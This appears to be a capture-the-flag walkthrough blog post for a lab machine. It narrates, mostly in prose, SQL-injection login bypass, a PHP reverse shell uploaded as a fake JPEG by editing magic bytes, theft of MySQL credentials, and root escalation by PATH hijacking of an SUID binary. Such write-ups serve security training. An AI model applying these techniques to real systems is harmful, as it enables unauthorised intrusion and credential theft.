Buy Me A Coffee


Run Nmap Scan against the IP

Go to the Website, we can see we need to login to upload image

Go to login page,Lets try sql injection in there

And that was successfull , Now we can access the webpage without login.
Now lets try to upload image. But Actually we are not uploading any image,
we are uploading the php script to check, whether it is vulnerable or not

For uploading php script we need to edit the magic numbers , for that google for magic numbers

Scroll down to view jpg/jpeg and we can see the hex values

Now open ghex with image file and edit the magic numbers

Now Upload it with the help of burpsuite bychanging file a.jpg to a.php.jpg


We can see the file uploaded successfully

Now we need to identify ,where is the file uploaded , for that run dirsearch for searching active directives

We can see in image directory , "uploads" folder is available

Go to the 'img/uploads' folder and add "a.php.jpg" which is uploaded by me,
we can see the php version, so we can upload php reverse shell also here

I uploaded reverse shell and got shell back

cat etc/passwd shows that there is "theseus" user available

Going through db.php5 file which is located in Magic folder in '/var/www' we can see the mysql database creadentials

Dump mysql creadentials to a file

open the file and we can see the creadentials

login to theseus with the password we got now, and we got theseus shell

Now going to SUID binaries i found a intresting file in /bin/which is sysinfo

check what the sysinfo does

We can see it executing hardware informations , So lets check hardware report commands in linux,we found few

Now lets modify 'lshw' command with our custom command and modify the PATH.
then executing sysinfo, we got rootshell, Beacouse sysinfo command calling 'lshw' command and we modified it

We got shell but this shell is not intractive ,so run bash script to get reverse shell, And finaly we got root.txt